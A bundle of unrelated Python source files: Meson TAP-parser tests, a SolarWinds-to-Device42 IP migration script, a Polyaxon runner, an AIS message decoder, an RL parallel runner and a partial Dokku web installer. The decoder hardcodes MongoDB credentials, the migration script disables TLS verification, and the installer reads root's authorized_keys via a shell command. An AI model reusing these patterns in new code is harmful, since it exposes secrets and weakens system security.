self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
swipam_d42.py
|
#!/usr/bin/env python
import sys
import os
import json
import base64
import ConfigParser
import threading
import Queue
import time
import requests
try:
requests.packages.urllib3.disable_warnings()
except:
pass
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
CONFIG = os.path.join(CURRENT_DIR,'settings.conf')
class Device42():
def __init__(self, d42_server, d42_user, d42_secret, debug, hdevice, hlabel):
self.base_url = d42_server
self.username = d42_user
self.password = d42_secret
self.debug = debug
self.hdevice = hdevice
self.hlabel = hlabel
def uploader(self, data, url):
payload = data
headers = {
'Authorization': 'Basic ' + base64.b64encode(self.username + ':' + self.password),
'Content-Type': 'application/x-www-form-urlencoded'
}
r = requests.post(url, data=payload, headers=headers, verify=False)
msg = unicode(payload)
msgpayload = '\t[*] POST payload: %s' % msg
if self.debug:
print msgpayload
msgstatus = '\t[+] Status code: %s' % str(r.status_code)
if self.debug:
print msgstatus
msg = str(r.text)
msgtext = '\t[*] Response: %s' % msg
if self.debug:
print msgtext
if r.status_code in (401, 403, 404, 500, 503):
print msgtext
return msg
def post_subnet(self, data, subnet):
url = self.base_url + '/api/1.0/subnets/'
msg = '\r\n[!] Posting subnet %s ' % subnet
print msg
self.uploader(data, url)
def post_ip(self, data):
url = self.base_url + '/api/ip/'
msg = '\r\n[!] Posting ip %s ' % data['ipaddress']
print msg
self.uploader(data, url)
class SwisClient():
def __init__(self, hostname, username, password, filter_broadcast):
self.url = "%s:17778/SolarWinds/InformationService/v3/Json/" % (hostname)
self.credentials = (username, password)
self.headers = {'Content-Type': 'application/json'}
self.include_broadcast = filter_broadcast
def get_data(self, payload=None):
r = requests.request('POST', self.url + 'Query',
data=json.dumps(payload),
auth=self.credentials,
headers=self.headers,
verify=False)
if r.status_code == 200:
return r.json()
def get_subnets(self):
networks = []
results = self.get_data({'query': 'SELECT address,cidr,friendlyname FROM IPAM.Subnet'})
if results:
for result in results['results']:
data = {}
name = result['friendlyname']
cidr = result['cidr']
address = result['address']
if address not in ['null', None] and cidr != 0: # prevent empty address and universal netmask
data.update({'network': address})
data.update({'mask_bits': cidr})
data.update({'name': name})
if data not in networks:
networks.append(data)
for network in networks:
net = network['network']
d42.post_subnet(network, net)
def get_ips(self):
results = self.get_data({'query': 'SELECT ipaddress, mac, status, dnsbackward FROM IPAM.IPNode'})
if results:
q = Queue.Queue()
for result in results['results']:
data = {}
ipaddress = result['ipaddress']
macaddress = result['mac']
status = result['status']
devicename = result['dnsbackward']
print ipaddress
if not self.include_broadcast:
split_ip = ipaddress.split('.')
last_ip_range_digit = split_ip[3]
if last_ip_range_digit == '0' or last_ip_range_digit == '255': # ip is broadcast ip
print 'ip address {} is broadcast address, skipping'.format(ipaddress)
continue
data.update({'ipaddress': ipaddress})
data.update({'macaddress': macaddress})
if status == 2:
data.update({'available':'yes'})
if status == 4:
data.update({'type':'reserved'})
if devicename and devicename not in ('',' '):
if hdevice:
data.update({'device': devicename})
if hlabel:
data.update({'tag': devicename})
q.put(data)
threads = []
while 1:
if not q.empty():
self.has_jobs(threads)
threads = [t for t in threads if not t.stopped]
tcount = len(threads)
if tcount < 20:
ip = q.get()
print ip
p = CustomThread(target=d42.post_ip, args=(ip,))
p.start()
threads.append(p)
else:
time.sleep(0.5)
else:
while len(threads) != 0:
time.sleep(1)
self.has_jobs(threads)
threads = [t for t in threads if not t.stopped]
msg = 'Waiting for threads to finish. Current thread count: %s' % str(len(threads))
print msg
break
def has_jobs(self, threads):
for t in threads:
if not t.is_alive():
t.stopped = True
class CustomThread(threading.Thread):
def __init__(self, target, args):
self.stopped = False
threading.Thread.__init__(self, target=target, args=args)
def read_settings():
if not os.path.exists(CONFIG):
print '\n[!] Error. Cannot find config file!\n'
sys.exit()
cc = ConfigParser.RawConfigParser()
cc.readfp(open(CONFIG,"r"))
sw_ipam_server = cc.get('settings', 'sw_ipam_server')
sw_ipam_user = cc.get('settings', 'sw_ipam_user')
sw_ipam_secret = cc.get('settings', 'sw_ipam_secret')
d42_server = cc.get('settings', 'd42_server')
d42_user = cc.get('settings', 'd42_user')
d42_secret = cc.get('settings', 'd42_secret')
migrate_subnets = cc.getboolean('settings', 'migrate_subnets')
migrate_ips = cc.getboolean('settings', 'migrate_ips')
debug = cc.getboolean('settings', 'debug')
hdevice = cc.getboolean('settings', 'send_hostname_as_device')
hlabel = cc.getboolean('settings', 'send_hostname_as_label')
filter_broadcast = cc.getboolean('settings', 'include_broadcast_addresses')
return sw_ipam_server,sw_ipam_user,sw_ipam_secret,d42_server,d42_user,d42_secret,\
migrate_subnets, migrate_ips, debug, hdevice, hlabel, filter_broadcast
if __name__ == "__main__":
sw_ipam_server,sw_ipam_user,sw_ipam_secret,d42_server,d42_user,d42_secret,\
migrate_subnets, migrate_ips, debug, hdevice, hlabel, filter_broadcast = read_settings()
d42 = Device42(d42_server, d42_user, d42_secret, debug, hdevice, hlabel)
swis = SwisClient(sw_ipam_server, sw_ipam_user, sw_ipam_secret, filter_broadcast)
if migrate_subnets:
print 'getting subnets'
swis.get_subnets()
if migrate_ips:
print 'getting ips'
swis.get_ips()
print '\n[!] Done!'
sys.exit()
|
local_runner.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import atexit
import json
import os
import signal
import subprocess
import sys
import time
from six.moves import xrange
from multiprocessing import Process
from tensorflow.python.platform import tf_logging as logging
from polyaxon_schemas.polyaxonfile.polyaxonfile import PolyaxonFile
from polyaxon_schemas.polyaxonfile.specification import Specification
from polyaxon_schemas.utils import TaskType
from polyaxon_lib.polyaxonfile.manager import (
prepare_all_experiment_jobs,
start_experiment_run,
)
jobs = []
processes = []
current_run = {'finished': False, TaskType.MASTER: None}
def cleanup():
for job in jobs:
job.terminate()
job.join()
# Register cleanup function to the exit of this module
atexit.register(cleanup)
def signal_handler(*args):
for p in processes:
p.terminate()
current_run['finished'] = True
def check_master_process():
print([p.is_alive() for p in jobs])
if not current_run['master'].is_alive():
signal_handler()
cleanup()
def get_pybin():
try:
pybin = os.path.join(os.environ['VIRTUAL_ENV'], 'bin/python')
except: # pylint: disable=bare-except
pybin = sys.executable
return pybin
def run_cmd(pybin, cmd, cwd):
env_cmd = '{} {}'.format(pybin, cmd)
signal.signal(signal.SIGINT, signal_handler)
logging.info(env_cmd)
p = subprocess.Popen(env_cmd, cwd=cwd, shell=True)
processes.append(p)
_, error = p.communicate()
if error:
logging.error('{} - ERROR: '.format(error))
def create_process(env):
cmd = ("""-c \"from polyaxon_lib.polyaxonfile.local_runner import start_experiment_run;
start_experiment_run(
'{polyaxonfile}', '{experiment_id}', '{task_type}', {task_id}, '{schedule}')\"""".format(
**env))
p = Process(target=run_cmd, args=(get_pybin(), cmd, os.getcwd(),))
p.daemon = True
p.start()
jobs.append(p)
if env['task_type'] == TaskType.MASTER:
current_run[TaskType.MASTER] = p
def run_experiment(spec_config, xp):
spec = Specification.read(spec_config)
logging.info("running Experiment n: {}".format(xp))
cluster, is_distributed = spec.cluster_def
if not is_distributed:
start_experiment_run(spec, xp, TaskType.MASTER, 0, 'continuous_train_and_eval')
current_run['finished'] = True
else:
env = {
'polyaxonfile': json.dumps(spec.parsed_data),
'task_type': TaskType.MASTER,
'experiment_id': xp,
'task_id': 0,
'schedule': 'train_and_evaluate'
}
create_process(env)
for i in xrange(cluster.get(TaskType.WORKER, 0)):
env['task_id'] = i
env['task_type'] = TaskType.WORKER
env['schedule'] = 'train'
create_process(env)
for i in xrange(cluster.get(TaskType.PS, 0)):
env['task_id'] = i
env['task_type'] = TaskType.PS
env['schedule'] = 'run_std_server'
create_process(env)
for job in jobs:
job.join()
def run(polyaxonfile):
plx_file = PolyaxonFile.read(polyaxonfile)
for xp in range(plx_file.matrix_space):
run_experiment(plx_file.experiment_specs[xp], xp)
while not current_run['finished']:
check_master_process()
time.sleep(10)
current_run['finished'] = False
current_run['master'] = None
def run_all(polyaxonfile):
plx_file = PolyaxonFile.read(polyaxonfile)
for xp in range(plx_file.matrix_space):
xp_jobs = prepare_all_experiment_jobs(plx_file.experiment_specs[xp], xp)
for i, xp_job in enumerate(xp_jobs):
if i == 0:
schedule = 'train_and_evaluate'
else:
schedule = 'train'
p = Process(target=getattr(xp_job, schedule))
p.start()
jobs.append(p)
for job in jobs:
job.join()
|
decoder.py
|
import logging
import platform
from datetime import datetime
from multiprocessing import Process, Pool
from time import sleep
import psutil
from ais import stream
from pymongo import MongoClient, errors
from requests import post
from src.functions import more_processing
software_version = 0.2
inFile = "ais_undecoded.msg"
outFile = 'ais_decoded.txt'
LOG_FILE_NAME = "decoder.log"
HCTK_URL = 'http://bigdata2.research.cs.dal.ca:8087/beat'
def save_mongo(result):
client = MongoClient('mongodb://useradmin:[email protected]:27011/ais')
try:
client.ais.ais_data.insert_many(result)
for message in result:
more_processing(message)
except errors.PyMongoError as e:
print("save_mongo(): ", str(e))
def utc_time(date_obj):
try:
return datetime.strptime(date_obj, "%Y-%m-%d %H:%M:%S.%f")
except Exception as e:
print("utc_time():", str(e))
# take a file path, read it and parse message,
def read_file_decode(file_path):
client = MongoClient('mongodb://useradmin:[email protected]:27011/ais')
lst = []
logging.error("Starting on file: " + file_path)
counter = 0
with open(file_path) as msg_file:
for msg in stream.decode(msg_file):
msg['batch'] = True
time = utc_time(msg_file.readline().strip('\n'))
if time:
msg['event_time'] = time
try:
x = msg.get('x', None)
y = msg.get('y', None)
if x is not None and y is not None and abs(x) <= 180 and abs(y) < 90:
msg['location'] = {'type': 'Point', 'coordinates': [x, y]}
except Exception as e:
print("read_file_decode():", str(e))
if len(lst) != 1000:
lst.append(msg)
else:
save_mongo(lst)
lst.clear()
lst.append(msg)
if lst:
save_mongo(lst)
lst.clear()
logging.error("Finished Decoding " + file_path)
with open(outFile, 'a+') as outF:
outF.write(file_path + '\n')
def system_status():
os, name, version, _, _, _ = platform.uname()
version = version.split('-')[0]
cores = psutil.cpu_count()
cpu_percent = psutil.cpu_percent()
memory_percent = psutil.virtual_memory()[2]
disk_percent = psutil.disk_usage('/')[3]
boot_time = datetime.fromtimestamp(psutil.boot_time())
running_since = boot_time.strftime("%A %d. %B %Y")
res = {
"os": os,
"OS Version": version,
"health_check_repeat": 600,
"name": "File Decoder",
"cores": cores,
'risk_mitigation_file': __file__,
"disk percent": disk_percent,
"cpu percent": cpu_percent,
"memory percent": memory_percent,
"running since": running_since,
"App version": software_version
}
return res
def health_check():
while 1:
print("Calling Health Check")
try:
res = system_status()
upload(res)
except Exception as e:
print("health_check():" + str(e))
finally:
sleep(600)
def upload(data):
try:
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
post(HCTK_URL, json=data, headers=headers, timeout=40)
except Exception as e:
print("hchk:" + e)
def follow(thefile):
thefile.seek(0, 2)
while True:
line = thefile.readline()
if not line:
sleep(0.1)
continue
yield line
def decode_pool(values):
pool = Pool(processes=10)
pool.map(read_file_decode, values)
def decode_proc():
inputFile = open(inFile, 'r')
inputFiles = [x.rstrip() for x in inputFile]
Process(target=decode_pool, args=(inputFiles,)).start()
input_lines = follow(inputFile)
for line in input_lines:
print("Working on:", line)
line = line.rstrip()
Process(target=read_file_decode(line)).start()
if __name__ == '__main__':
for handler in logging.root.handlers[:]: logging.root.removeHandler(handler)
logging.basicConfig(level=logging.ERROR, format='%(asctime)s:\n %(message)s\n',
datefmt='%m/%d/%Y %I:%M:%S %p', filename=LOG_FILE_NAME)
logging.error("Running at " + str(datetime.now()))
try:
Process(target=decode_proc).start()
Process(target=health_check, daemon=True).start()
except Exception as e:
print("main():" + str(e))
|
parallel_runner.py
|
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
from modules.utils.maven_module import EZAgent as enza
# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
class ParallelRunner:
def __init__(self, args, logger):
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
# Make subprocesses for the envs
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
env_fn = env_REGISTRY[self.args.env]
self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
for worker_conn in self.worker_conns]
for p in self.ps:
p.daemon = True
p.start()
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
def setup(self, scheme, groups, preprocess, mac):
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
if self.args.name == 'maven':
self.noise_distrib = enza(self.args, logger=self.logger)
if self.args.use_cuda:
self.noise_distrib.cuda()
def get_env_info(self):
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
self.batch.update(pre_transition_data, ts=0)
if self.args.name == 'maven':
self.noise = self.noise_distrib.sample(self.batch['state'][:,0], False)
self.batch.update({"noise": self.noise}, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
self.reset()
all_terminated = False
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
terminated = [False for _ in range(self.batch_size)]
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1)
}
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
episode_returns[idx] += data["reward"]
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
# maven
if self.args.name == 'maven':
self.noise_distrib.update_returns(self.batch['state'][:,0], self.noise, episode_returns, test_mode, self.t_env)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
if test_mode and (len(self.test_returns) == n_test_runs):
self._log(cur_returns, cur_stats, log_prefix)
elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
self._log(cur_returns, cur_stats, log_prefix)
if hasattr(self.mac.action_selector, "epsilon"):
self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
stats.clear()
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
|
dokku-installer.py
|
#!/usr/bin/env python2.7
import cgi
import json
import os
import re
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.12.13'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(line)
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, m.group(1))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
